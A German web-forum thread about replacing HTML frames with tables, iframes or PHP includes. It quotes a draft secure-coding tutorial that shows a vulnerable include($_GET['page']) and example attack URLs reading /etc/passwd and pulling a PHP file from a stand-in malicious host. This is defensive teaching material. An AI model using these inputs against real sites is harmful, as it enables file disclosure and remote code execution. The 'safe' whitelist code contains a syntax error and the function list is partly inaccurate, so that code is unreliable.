Tables- Navigation

Hi leute,
Ich habe vor fuer nen Kumpel ein kleines spassprojekt zu starten,
dafuer wollte ich die Seite machen.
Ich hab frueher schon mal die eine oder andere page gecodet (in html) und hab da fuer die navigation immer Frames genutzt.
Ich habe begriffen, das das der falsche Weg ist^^.
Also hab ich mir dieses "tut" zu Herzen genommen:
Selfhtml.org
Sowieso die beste seite, wenn man html lernen will denke ich.

Hat auch alles wunderbar geklappt mit den tables,
NUR.. mir gefaellt die moeglichkeit bei frames,
mit der navigation einfach:
Code:
<a href="bla.htm" [COLOR=red]target="rechts"[/COLOR]>bla</a>
Ich hoffe ihr versteht was ich meine.
Und jetzt bei tables, wenn ich auf den link inder navi-table klicke, das ich das dann in der rechten tabelle zu sehen bekomme.

"ps, hab die boardsuche benutzt, und nicht das gefunden was ich gesucht hab"

Vielen Dank schonma:)
 
Diese Möglichkeit hast du mit Tabellen nicht, vieleicht mit JavaScript, wozu ich dir aber nicht rate ;)

mfg
coderinblack
 
Mir würde ein Template-System bzw Content Management System dazu einfallen.
Aber das ist aufwendiger und für den Anfang nicht so geeignet... :p

Ich denke eine Seite mit der Navigation in die ein Iframe eingebunden wird, ist das einfachste für dich... obwohl das auch nicht das schönste ist.
Aber so kannst du für die Seitengestaltung eine Tabellenkonstruktion verwenden und den Inhalt bequem im Iframe laden. ;)
 
na von iframes würde ich aber mal ganz die finger lassen :)
wie gesagt, php include ist nicht so schön wie css, aber allemale besser als iframes!
und guck dir mal ein paar cms an, die arbeiten sehr oft mit includes.
 
Ich hab ja auch nur gesagt, dass Iframes einfach sind und habe auch darauf hingewiesen, dass es schönere und bessere Möglichkeiten gibt.
Wollte ihm nur eine einfache Alternative zu Includierungen nennen.

Außerdem sollte man bei Include-Anweisungen sehr vorsichtig sein, da sie ein enormes Sicherheitsrisiko darstellen, wenn sie nicht abgesichert sind. ;)
 
Ich hab letztens irgendwo was ueber sicheres php coden gesehen, mal gucken wo das war.
Nur was ist dann die gefahr wenn ich das falsch bzw nicht sicher mache?

Mfg
 
Original von happy
na von iframes würde ich aber mal ganz die finger lassen :)
wie gesagt, php include ist nicht so schön wie css, aber allemale besser als iframes!
und guck dir mal ein paar cms an, die arbeiten sehr oft mit includes.

Was hat denn css mit php(includes) zu tun???
ich nutze beides zugleich. Warum auch nicht?!
Nur wie oben schon erwähnt solltest du bei includes auf Sicherheit achten, so das keine fremden Inhalte bzw seiten includiert werden können.

Gefahren
Die Gefahr bei unsicherem includen besteht halt darin das jemand seine (bösen) Scripte auf deinem Server ausführen lassen kann. was dann passieren kann, kannst du dir sicher denken oder? ;)

Suchmaschienen
Einige Suchmaschiennen haben Problem mit Variable in der Url, somit solltest Du dann über den Einsatz von mod_rewrite nachdenken, um diesen Problemen aus dem Weg zu gehen.

Edit: Falls du ein Script brauchst zum sicheren includen, schreib einfach
 
Ich bin gerade dabei ein Tutorial zu schreiben wie man PHP-Anwendungen sicher programmiert. Aber es sind erst 50% fertig....

Hier ist ein Abschnitt (zu Includierungen):

Eine ebenso oft ausgenutzte Schwachstelle ist das mangelhafte Absichern von Include- & Require-Anweisungen (sog. Remote-Command-Executions).

Ein typisches Beispiel für ein unsicheres Includieren:
<?php
include ($_GET['page'])
?>


Die dazugehörige URL könnte dann so etwa lauten:
http://deine-seite.de/?page=index.php

Da keinerlei überprüfung stattfindet könnte man sich so jede Datei unterhalb des Arbeitsverzeichnis anzeigen lassen, oder bei eingeschaltetem URL-Wrapper sogar eine PHP-Datei von einem fremden Rechner ausführen lassen.

Beispiel(e):
http://deine-seite.de/?page=/etc/passwd/
http://deine-seite.de/?page=http://boese-seite.de/boese.php

Daher sollte man auch hier das Prinzip der Whitelists* verwenden um solchen Missbrauch von Include-Konstrukten auszuschließen.

Beispiel für sicheres Includieren:
<?php
$whitelist = array('page1.php','page2.php','page3.php');
if (in_array($_GET['page'];$whitelist))
include ($_GET['page']);
else
echo 'Kein Zugriff erlaubt!';
?>


Folgende Funktionen sollten nur in Verbindung mit einer Whitelist-Überprüfung verwendet werden:
- include()
- require()
- fopen()
- file_get_contents()
- file_put_contents()
- join()
- implode()

*) Whitelist = Liste (bzw Array) in der sich alle Dinge befinden, die erlaubt sind. Alles andere führt zu einem Fehler.
Blacklist = Liste (bzw Array) in der alle Dinge stehen, die verboten sind. Leider kann man immer wieder etwas vergessen, sodass man hier nur eine begrenzte Sicherheit hat.
.
 
ja und was ist mit dem default-befehl?

also

switch (){
case "1":
include "main.php";
break;
default:
print "Link nicht vorhande";
}


???

Oder hab ich das falsch verstanden?
 
Ich bin gerade erst aufgestanden, kann also sein, dass ich noch etwas neben mir stehe. Aber die Switch-Funktion hindert eigentlich niemand daran, eine bestimmte Variable über die URL zu initialisieren und die Datei zu includieren.

Das einzigste was mir jetzt einfallen würde, was am sichersten ist, ist ne Whitelist überprüfung der vorhandenen Seiten (habe ich oben ja schon geschrieben, wie das geht).
Bei allen anderen Konstrukten besteht die Gefahr, dass man etwas vergisst oder dass jmd schlauer ist und doch einen Weg findet wie man ne fremde Datei includieren kann. ;)

Und ich bin so fertig, ich glaub ich leg mich grad wieder hin.... :p
 
also erstmal sollteste die finger von tabellendesign lassen. das ist mitlerweile auch schon schnee von gestern ... heute baut man seiten mit xhtml und css ...

http://de.selfhtml.org/css/layouts/index.htm

zudem war hier erst vor kurzen ne diskussion über includes und php .. da waren meiner meinung auch beispielskripte dabei ... also einfach mal suchen.

mfg
bugbuster

*edit*

schau mal hier ->

http://tut.php-q.net/frames.html#f1


meistens sind includes seitens des providers auf lokal beschränkt oder täusche ich mich da?
 
Einem Anfänger sollte man nicht direkt (X)HTML bzw XML zumuten.
Ich finde man sollte erst einmal die Grundlagen in HTML beherrschen und sich dann an XHTML wagen.

Und man kann auch Dateien von anderen Servern includieren. Kommt halt auf die PHP-Einstellungen an...
Bei eingeschaltetem URL-Wrapper kann man auch Dateien von anderen Servern includieren (und URL-Wrapper ist meistens aktiviert; bei PHP4 glaub ich sogar noch standartmäßig eingeschaltet).
 
Original von m1ndless
Einem Anfänger sollte man nicht direkt (X)HTML bzw XML zumuten.
Ich finde man sollte erst einmal die Grundlagen in HTML beherrschen und sich dann an XHTML wagen.

Und man kann auch Dateien von anderen Servern includieren. Kommt halt auf die PHP-Einstellungen an...
Bei eingeschaltetem URL-Wrapper kann man auch Dateien von anderen Servern includieren (und URL-Wrapper ist meistens aktiviert; bei PHP4 glaub ich sogar noch standartmäßig eingeschaltet).

XHTML schon! Warum nicht gleich "richtig" lernen?
XML braucht man hingegen nicht für "normale" Webseiten. Erst wenns professionell wird, und selbst dann solte man schon gewisse Grundfähigkeiten besitzen.
 
Zurück
Oben